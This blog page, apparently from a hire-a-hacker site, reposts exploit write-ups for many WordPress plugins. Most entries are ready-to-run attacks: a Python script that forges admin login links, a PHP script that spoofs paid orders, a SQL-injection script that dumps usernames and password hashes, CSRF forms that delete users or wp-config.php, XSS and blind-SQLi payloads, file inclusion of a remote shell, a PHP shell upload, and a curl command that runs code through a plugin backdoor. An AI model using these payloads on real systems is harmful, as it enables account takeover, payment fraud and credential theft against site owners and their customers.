Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130502

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
# Date: 2021-09-16
# Exploit Author: Sebastian Kriesten (0xB455)
# Contact: https://twitter.com/0xB455
#
# Affected Plugin: Booster for WooCommerce
# Plugin Slug: woocommerce-jetpack
# Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/
# Affected Versions: <= 5.4.3
# Fully Patched Version: >= 5.4.4
# CVE: CVE-2021-34646
# CVSS Score: 9.8 (Critical)
# Category: webapps
#
# 1:
# Goto: https://target.com/wp-json/wp/v2/users/
# Pick a user-ID (e.g. 1 - usualy is the admin)
#
# 2:
# Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1
#
# 3:
# Check-Out  out which of the generated links allows you to access the system
#
import requests,sys,hashlib
import argparse
import datetime
import email.utils
import calendar
import base64

B = "\033[94m"
W = "\033[97m"
R = "\033[91m"
RST = "\033[0;0m"

parser = argparse.ArgumentParser()
parser.add_argument("url", help="the base url")
parser.add_argument('id', type=int, help='the user id', default=1)
args = parser.parse_args()
id = str(args.id)
url = args.url
if args.url[-1] != "/": # URL needs trailing /
        url = url + "/"

verify_url= url + "?wcj_user_id=" + id
r = requests.get(verify_url)

if r.status_code != 200:
        print("status code != 200")
        print(r.headers)
        sys.exit(-1)

def email_time_to_timestamp(s):
    tt = email.utils.parsedate_tz(s)
    if tt is None: return None
    return calendar.timegm(tt) - tt[9]

date = r.headers["Date"]
unix = email_time_to_timestamp(date)

def printBanner():
    print(f"{W}Timestamp: {B}" + date)
    print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n")
    print("We need to generate multiple timestamps in order to avoid delay related timing errors")
    print("One of the following links will log you in...\n")

printBanner()



for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors
        hash = hashlib.md5(str(unix-i).encode()).hexdigest()
        print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:")
        token='{"id":"'+ id +'","code":"'+hash+'"}'
        token = base64.b64encode(token.encode()).decode()
        token = token.rstrip("=") # remove trailing =
        link = url+"my-account/?wcj_verify_email="+token
        print(link + f"\n{RST}")
HireHackking 
# Exploit Title: WordPress woocommerce  directory traversal
# Date: 28-11-2017
# Software Link: https://wordpress.org/plugins/woocommerce/
# Exploit Author:fu2x2000
# Contact: fu2x2000@gmail.com
# Website:
# CVE:2017-17058
#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0
# Category: webapps


1. Description

Identifying woo commerce theme pluging properly sanitized against Directory
Traversal,even the latest version of WordPress with woocommerce can be
vulnerable.

2. Proof of Concept

$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
function file_get_contents_utf8($fn) {
    $opts = array(
        'http' => array(
            'method'=>"GET",
            'header'=>"Content-Type: text/html; charset=utf-8"
        )
    );

    $wp = stream_context_create($opts);
    $result = @file_get_contents($fn,false,$wp);
    return $result;
}
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");

$result = file_get_contents_utf8("http://".$woo);

echo $result;


Regards

Fu2x200
HireHackking 
<?php
# Exploit Title: WordPress WooCommerce - GloBee (cryptocurrency) Payment Gateway Plugin [Payment Bypass / Unauthorized Order Status Spoofing]
# Discovery Date: 14.12.2018
# Public Disclosure Date: 14.02.2019
# Exploit Author: GeekHack
# Contact: https://t.me/GeekHack
# Vendor Homepage: https://globee.com/ (previously payb.ee)
# Software Link: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/releases/tag/v1.1.1
# Version: <= 1.1.1
# Tested on: WordPress 4.9.9 + WooCommerce 3.5.1 + GloBee Payment Gateway Plugin 1.1.1
# CVE: CVE-2018-20782

/*
  Description:

  Reliance on untrusted inputs (CWE-807), insufficient data verification and lack of any cryptographic authentication (hmac etc) at IPN callback (ipn_callback() function in Gateway.php at 374 line) allow remote (even unauthorized) attacker to bypass payment process and spoof real order status without actually paying for it.

  [code ref: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/blob/8c254d6100ef4cfb3432b219726f4936c1531234/src/Gateway.php#L374]

  Such actions like 'changin order status' normally require administrative rights. But in this case anyone can perform these actions, even with the most limited rights, therefor this issue "can" also be considered as a Privilege Escalation (CWE-269) vulnerability (but it's not quite right, imho).
*/

if(php_sapi_name() !== 'cli')
	die('Use CLI: php '.__FILE__);
if(!extension_loaded('curl'))
	die('cURL extension is required');

echo 'Payment Bypass (CVE-2018-20782) PoC by GeekHack team.'."\n";
echo 'Select any product(s) in a vulnerable store and continue checkout through payment via cryptocurrencies (GloBee Payment Gateway).'."\n\n";

$shopURL = rtrim(readline('Shop root URL (https://shop.example.com/): '), '/');
if(strpos(@get_headers($shopURL)[0], '200') === false)
	die('Shop url is invalid or not exists (or request was blocked), check link format and try again.');
$paymentLink = readline('Payment link (https://globee.com/en/payment-request/XXXXXXXXXXXXXXXXXXXXXX): ');
if(preg_match('/https:\/\/globee\.com\/en\/payment-request\/(\w*)/', $paymentLink, $matches)) {
	$paymentID = $matches[1];
}else{
	die('Payment link is invalid, check link format and try again.');
}
$orderID = (int)readline('Order ID: ');
if(!$orderID)
	die('Order ID is invalid, must be a positive integer, try again.');

$payload = [ // commented fields are not required for exploitation
	'id' => $paymentID,
	'status' => 'completed',
	//'total' => '123.45',
	//'currency' => "USD",
	'custom_payment_id' => $orderID,
	//'callback_data' => "example data",
	/*'customer' => [
		'name' => 'John Smit',
		'email' => 'john.smit@hotmail.com'
	],*/
	/*'payment_details' => [
		'currency' => 'BTC'
	],*/
	//'redirect_url' => 'http://globee.com/invoice/'.$paymentID,
	//'success_url' => $shopURL,
	//'cancel_url' => $shopURL,
	//'ipn_url' => $shopURL.'/wc-api/globee_ipn_callback',
	//'notification_email' => null,
	//'confirmation_speed' => 'medium',
	//'expires_at' => '2018-01-25 12:31:04',
	//'created_at' => '2018-01-25 12:16:04'
];

$curl = curl_init();
curl_setopt_array($curl, array(
	CURLOPT_URL => $shopURL.'/wc-api/globee_ipn_callback',
	CURLOPT_RETURNTRANSFER => true,
	CURLOPT_ENCODING => "",
	CURLOPT_MAXREDIRS => 2,
	CURLOPT_TIMEOUT => 10,
	CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
	CURLOPT_CUSTOMREQUEST => 'POST',
	CURLOPT_POSTFIELDS => json_encode($payload),
	CURLOPT_HTTPHEADER => array(
		'cache-control: no-cache',
		'content-type: application/json',
	),
));

$response = curl_exec($curl);
$err = curl_error($curl);

curl_close($curl);

if ($err) {
	echo 'cURL Error #: '.$err;
} else {
	echo 'Done: '.$response;
}
HireHackking 
<!--
# Exploit Title:  Plugin to Wordpress Woo Import Export 1.0 RCE – Unlink
# Date: 24/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: * https://wordpress.org/plugins/woo-import-export-lite/
# Software Link: * https://wordpress.org/plugins/woo-import-export-lite/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version:  1.0
# Tested on: Ubuntu 16.1


1 - Description


   - Type user access: any user registered.
         - $_POST['file_name'] is not escaped.

Article:
*http://lenonleite.com.br/en/publish-exploits/english-plugin-woo-import-export-1-0-rce-unlink/

Video:

*https://www.youtube.com/watch?v=pImtGeecdCk

2. Proof of Concept
-->

<form method="post"
action="http://server/wp-admin/admin-ajax.php?action=wpie_remove_export_entry">
   <input type="text" name="file_name" value="../../../wp-config.php">
   <input type="text" name="log_id" value="aaa">
   <input type="submit">
</form>

<!--
   - Date Discovery : *11/25/2017*
      - Date Vendor Contact : *12/29/2017*
      - Date Publish : 24/04/2018
      - Date Resolution :
-->
HireHackking 
# Exploit Title: WonderPlugin Audio Player 2.0 Blind SQL Injection and XSS
# Date: 20-01-2015
# Software Link: http://www.wonderplugin.com/wordpress-audio-player/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description
  
wp_ajax_save_item() is accessible for every registered user (admin privileges are not checked).

save_item() uses is_id_exist() in which $id is not escaped properly.

2. Proof of Concept

Login as standard user (created using wp-login.php?action=register) then:

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
    <input type="text" name="item[id]" value="1 UNION (SELECT 1, 2, 3, 4, IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1)">
    <input type="submit" value="Hack!">
</form>

This SQL will check if first password character user ID=1 is "$".

If yes it will sleep 5 seconds.

For XSS use:

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
    <input type="hidden" name="item[id]" value="1">
    <input type="text" name="item[name]" value='<script>alert(String.fromCharCode(88,83,83));</script>'>
    <input type="text" name="item[customcss]" value='</style><script>alert(String.fromCharCode(88,83,83));</script>'>
    <input type="submit" value="Hack!">
</form>

It will be visible on every page where shortcode wonderplugin_audio is used and also in admin panel:

http://wordpress-url/wp-admin/admin.php?page=wonderplugin_audio_show_items

http://security.szurek.pl/wonderplugin-audio-player-20-blind-sql-injection-and-xss.html

3. Solution:
  
Update to version 2.1
HireHackking 
# Exploit Title: Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
# Date: 01-22-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://kaine.pl/
# Softwae Link: https://wordpress.org/plugins/wise-chat/
# Version: Up to V2.6.3
# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
# CVE : 2019-6780.


# Plugin description:
Wise Chat is a leading chat plugin that helps to build a social network and to increase user engagement on your website by providing the possibility to exchange real time messages in chat rooms. The plugin is easily installable and extremely configurable. Its features list is growing all the time.

# POC
Send following URL on wise chat "http://mtk911.cf/OR/" which has the following html

<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://mtk911.cf/');
if (window.parent != window) window.parent.location.replace('http://mtk911.cf/');
</script>
Open Redirect TEST
</html>

when you click on that user. This opens in a new tab, and the parent tab is silently redirected to my website without asking the user.

#Technical Details & Impact:
In a real life example, this would redirect to a phishing site to try gain credentials for users.

# References:
https://wordpress.org/plugins/wise-chat/#developers
https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk/src/rendering/filters/post/WiseChatLinksPostFilter.php
https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk#file6
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6780
HireHackking 
##################################################################################################
#Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility
#Author        : Manish Kishan Tanwar AKA error1046
#Home Page     : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/
#Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip
#Date          : 9/04/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

file uploading code(uploader.php) in Windows Desktop and iPhone Photo Uploader plugin doesnt check for file extension before uploading it to server
and hence vulnerable to arbitrary file upload

////////////////
///  POC   ////
///////////////


Uploading PHP shell 
=================================
Just open uploader.php in plugin directory
http://target.com/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php
browse your php shell and submit it.
after uploading, you will get your shell in uploads directory at following location

http://target.com/wp-content/uploads/i-dump-uploads/

demo:-
http://127.0.0.1/wordpress/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php
and upload your shell


                             --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, 
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
#############################################################################################
                             --==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)
                       --==[[ Special Fuck goes to ]]==--
                            <3  suriya Cyber Tyson <3
HireHackking 
source: https://www.securityfocus.com/bid/68954/info

WhyDoWork AdSense plugin for WordPress is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or perform unauthorized actions. Other attacks may also be possible.

WhyDoWork AdSense plugin 1.2 and prior are vulnerable. 

POST URL:
http://www.example.com/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101
Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-co
Accept-Encoding: gzip, deflate
Referer:
http://www.example.com/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1
Cookie:
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=hacking%7C1406766762%7C0a0ccdb16a9d99c2b9113e25e2ea6b8d;
wp-settings-time-1=1406489836;
wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=loreleitaron%7C1406766762%7C667e59a36d4254c8a178580770ac5135
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 843

CONTENIDO POST:
idx=1&whydowork_code=tets&whydowork_exclude=&whydowork_front_code_1=FALSE&whydowork_front_pos_1=top&whydowork_front_post_1=1&whydowork_front_code_2=FALSE&whydowork_front_pos_2=top&whydowork_front_post_2=1&whydowork_front_code_3=FALSE&whydowork_front_pos_3=top&whydowork_front_post_3=1&whydowork_page_code_1=FALSE&whydowork_page_pos_1=top&whydowork_page_code_2=FALSE&whydowork_page_pos_2=top&whydowork_page_code_3=FALSE&whydowork_page_pos_3=top&whydowork_single_code_1=FALSE&whydowork_single_pos_1=top&whydowork_single_code_2=FALSE&whydowork_single_pos_2=top&whydowork_single_code_3=FALSE&whydowork_single_pos_3=top&whydowork_singleold_code_1=FALSE&whydowork_singleold_pos_1=top&whydowork_singleold_code_2=FALSE&whydowork_singleold_pos_2=top&whydowork_singleold_code_3=FALSE&whydowork_singleold_pos_3=top&whydowork_adsense_oldday=&Submit=Update
HireHackking 
source: https://www.securityfocus.com/bid/51244/info

WHOIS for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

WHOIS 1.4.2.3 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/wp-content/plugins/wp-whois/wp-whois-ajax.php?cmd=wpwhoisform&ms=Xss?domain=[xss]
HireHackking 
======
Software: WordPress WHIZZ
Version: <1.1.1
Homepage: https://wordpress.org/plugins/whizz/
=======

Description
================
Get type CSRF in WordPress WHIZZ allows attackers to delete any wordpress users and change plugins status

POC:
========
include in the page ,then attack will occur:

delete user:

<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=users-list&uid=4&view=list_view&deletec=yes&list_of=all_users">


active or disactive plugins:

<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=activatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">

<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=deactivatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">


Mitigations
================
Disable the plugin until a new version is released that fixes this bug.


FIX:
==========
https://wordpress.org/plugins/whizz/ 1.1.1 changelog->Specifically
HireHackking 
# Exploit Title: WF Cookie Consent - Authenticated Persistent Cross-Site Scripting
# Date: 23/04/2018
# Exploit Author: B0UG
# Vendor Homepage: http://www.wunderfarm.com/
# Software Link: https://en-gb.wordpress.org/plugins/wf-cookie-consent/
# Version: Tested on version 1.1.3 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-10371

I. VULNERABILITY
-------------------------
Authenticated Persistent Cross-Site Scripting
 
II. BACKGROUND
-------------------------
WF Cookie Consent is a WordPress plugin which has been designed to display cookie consent notifications on a WordPress website.

III. DESCRIPTION
-------------------------
A authenticated persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser.

IV. PROOF OF CONCEPT
-------------------------
1) Access WordPress control panel.
2) Navigate to the 'Pages'.
3) Add a new page and insert the script you wish to inject into the page title.
4) Now navigate to 'Settings' and select 'WF Cookie Consent'.
5) Your injected script will now be executed.

V. IMPACT
-------------------------
An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
 
VI. SYSTEMS AFFECTED
-------------------------
WordPress websites running "WF Cookie Consent" plugin version 1.1.3 (older versions may also be affected).
 
VII. REMEDIATION
-------------------------
Implement a web application such as Wordfence or uninstall the plugin.

VIII. DISCLOSURE TIMELINE
-------------------------
April 23, 2018 1: Vulnerability identified.
April 23, 2018 2: Informed developer of the vulnerability.
May 2, 2018 3: No reply from the developer.
HireHackking 
# Exploit Title: WordPress Plugin Welcart e-Commerce 2.0.0 - 'search[order_column][0]' SQL injection
# Date: 04/08 2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://www.welcart.com/
# Software Link: https://downloads.wordpress.org/plugin/usc-e-shop.2.0.0.zip
# Category: Web Application
# Version: 2.0.0
# Tested on: Ubuntu 18.04.04 LTS / WordPress 5.4.2

# 05/08 2020: Vendor notified
# 06/08 2020: Vendor requested detailed information
# 06/08 2020: Information provided
# 11/08 2020: Vendor notified that a patch will be provided. No current ETA
# 10/12 2020: Vulnerability fixed

# 1. Description

The POST parameter "search[order_column][0]" does not sanitize user input when searching through the order lists.

# 2. Proof of Concept (PoC)

Use ZAP/Burp to capture the web request when searching through existing order lists and save it to request.txt
Referer: http://192.168.0.63/wp-admin/admin.php?page=usces_orderlist

sqlmap -r request.txt --dbms=mysql -p search[order_column][0]

Parameter: search[order_column][0] (POST)
	Type: time-based blind
	Payload: search[order_column][0]=ID) AND (SELECT 9900 FROM (SELECT(SLEEP(5)))tKPd) AND (8867=8867&search[order_word][0]=test&search[order_word_term][0]=contain&search[order_term]=AND&search[order_column][1]=&search[order_word][1]=&search[order_word_term][1]=contain&search[product_column][0]=&search[product_word][0]=&search[product_word_term][0]=contain&search[product_term]=AND&search[product_column][1]=&search[product_word][1]=&search[product_word_term][1]=contain&searchIn=Search&allchange[column]=&collective=&wc_nonce=5e3ed8895f&_wp_http_referer=/wp-admin/admin.php?page=usces_orderlist
HireHackking 
# Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/wechat-broadcast/
# CVE: CVE-2018-16283

# Description
# This bug was found in the file: /wechat-broadcast/wechat/Image.php
# echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
# The parameter "url" it is not sanitized allowing include local or remote files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol 
# to interact with the application.

# PoC
# The following URL have been confirmed that is vulnerable to local and remote file inclusion.

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

# Remote File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt
HireHackking 
source: https://www.securityfocus.com/bid/56660/info

The Webplayer plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/plugins/webplayer/config.php?id=[SQL]
HireHackking 
# Exploit Title: WordPress Plugin Weblizar 8.9 - Backdoor
# Google Dork: 'wp-json/am-member/license'
# Exploit Author: Sobhan Mahmoodi
# Vendor Homepage: https://weblizar.com/plugins/school-management/
# Version: 8.9
# Tested on: windows/linux

Vulnerable code:

add_action( 'rest_api_init', function() {
     register_rest_route(
           'am-member', 'license',
           array(
                'methods' => WP_REST_Server::CREATABLE,
                'callback' => function( $request ) {
                                $args = $request->get_params();
                                if ( isset( $args['blowfish'] ) && ! empty(
$args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] )
) {
                                               eval( $args['blowf'] );
                                }
                      };
                )
      );
} );


If you look at the code, the user code checks the parameters and finally executes the Blowf argument with the eval function. The Eval function is to take a string of PHP commands and execute it.

In order to be able to exploit this vulnerability, it is enough to send a request such as the following request that according to the above code, the part with If should be set blowfish and blowf arguments and not empty, and
given that eval executes the blowf value , Our favorite command must also be in this argument.

Proof of Concept:

curl -s -d 'blowfish=1' -d "blowf=system('id');" '
http://localhost:8888/wp-json/am-member/license'

uid=33(www-data) gid=33(www-data) groups=33(www-data)
HireHackking 
<?php
 
/*

# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9  [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection


 This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
 
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
 
    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
 
    # Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
    # Date: 2015-02-12
    # Exploit Author: Mateusz Lach
    # Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
    # Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
    # Version: 1.4.9
    # Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
    # CVE : CWE-89
    # OWASP Top10: A1-Injection
 */
 
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
 
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
 
define('FAKE_ID_TO_SEARCH', 12345677654321);
define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH);
define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');
define('ROW_SEPARATOR', ',');
define('FIELD_SEPARATOR', '##');
$server = $_GET['SRV'];
if (empty($server))
{
    echo 'Please put server (without protocol) name in SRV GET variable!';
}
else
{
    $fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
    $prefixCurl = curl_init($fullURL);
    curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($prefixCurl);
    if (stripos($result, PATTERN_TO_SEARCH) !== false)
    {
        preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames);
        $tableName = str_replace('####', '', $tableNames[0]);
        echo 'tableName: '.$tableName.'<BR/>';
        $fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
        $usersCurl = curl_init($fullURL);
        curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
        $result = curl_exec($usersCurl);  
        if (stripos($result, PATTERN_TO_SEARCH) !== false)
        {
            $from = stripos($result, PATTERN_TO_SEARCH_USERS);
            $to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
            $result = substr($result, $from, $to-$from);
            echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>';
        }
        else
        {
            echo 'Table name fetched, but not users - try to rewrite exploit :-(';
        }
    }
    else
    {
        echo 'NOT vulnerable :-(';
    }
}
HireHackking 
Source: http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf

DefenseCode ThunderScan SAST Advisory

WordPress WebDorado Gallery Plugin - SQL Injection Vulnerability
Advisory ID: DC-2017-02-011
Software: WordPress WebDorado Gallery Plugin
Software Language: PHP
Version: 1.3.29 and below
Vendor Status: Vendor contacted, vulnerability confirmed
Release Date: 20170502
Risk: Medium

1. General Overview
During the security audit, multiple security vulnerabilities were discovered in WordPress
WebDorado Gallery Plugin using DefenseCode ThunderScan application source code security
analysis platform.
More information about ThunderScan is available at URL:
http://www.defensecode.com


2. Software Overview
According to the plugin developers, WebDorado, Gallery plugin is a fully responsive
WordPress gallery plugin with advanced functionality that is easy to customize and has
various views. It has more than 300,000 downloads on wordpress.org.
Homepage:
https://wordpress.org/plugins/photo-gallery/
https://web-dorado.com/products/wordpress-photo-gallery-plugin.html
http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf


3. Vulnerability Description
During the security analysis, ThunderScan discovered SQL injection vulnerability in WebDorado
Gallery WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided
URL while being logged in as administrator or another user that is authorized to access the
plugin settings page. Any user with such privileges can obtain the valid bwg_nonce value by
previously visiting the settings page. Users that to do not have full administrative privileges
could abuse the database access the vulnerability provides to either escalate their privileges
or obtain and modify database contents they were not supposed to be able to.


3.1 SQL injection
Function: $wpdb->get_col($query)
Variable: $_GET['album_id']

Sample URL:
http://server/wp-admin/adminajax.php?action=addAlbumsGalleries&album_id=0%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5))
)VvZV)&width=700&height=550&bwg_items_per_page=20&bwg_nonce=b939983df9&TB_iframe=1

File: photo-gallery\admin\models\BWGModelAddAlbumsGalleries.php

26 $album_id = ((isset($_GET['album_id'])) ? esc_html(stripslashes($_GET['album_id'])) :
((isset($_POST['album_id'])) ? esc_html(stripslashes($_POST['album_id'])) : ''));
...
28 $page_nav = $this->model->page_nav($album_id);

File: photo-gallery\admin\views\BWGViewAddAlbumsGalleries.php

41 public function page_nav($album_id) {
...
44 $query = "SELECT id FROM " . $wpdb->prefix . "bwg_album WHERE published=1 AND id<>" .
$album_id . " " . $where . " UNION ALL SELECT id FROM " . $wpdb->prefix . "bwg_gallery WHERE
published=1 " . $where;
45 $total = count($wpdb->get_col($query));


4. Solution
Vendor resolved the security issues in one of the subsequent releases. All users are strongly
advised to update WordPress WebDorado Gallery plugin to the latest available version. Version
1.3.38 no longer seems to be vulnerable.


5. Credits
Discovered by Neven Biruski with DefenseCode ThunderScan source code security analyzer.


6. Disclosure Timeline
20170404 Vendor contacted
20170405 Vendor responded: “Thanks for noticing and told us about this, we will
take into account and will fix the issues with upcoming update.”
? Update released
20170502 Latest plugin version tested. Vulnerability seems fixed.
Advisory released to the public.
http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf


7. About DefenseCode
DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop
and mobile applications for security vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing)
solution for performing extensive security audits of application source code. ThunderScan
performs fast and accurate analyses of large and complex source code projects delivering
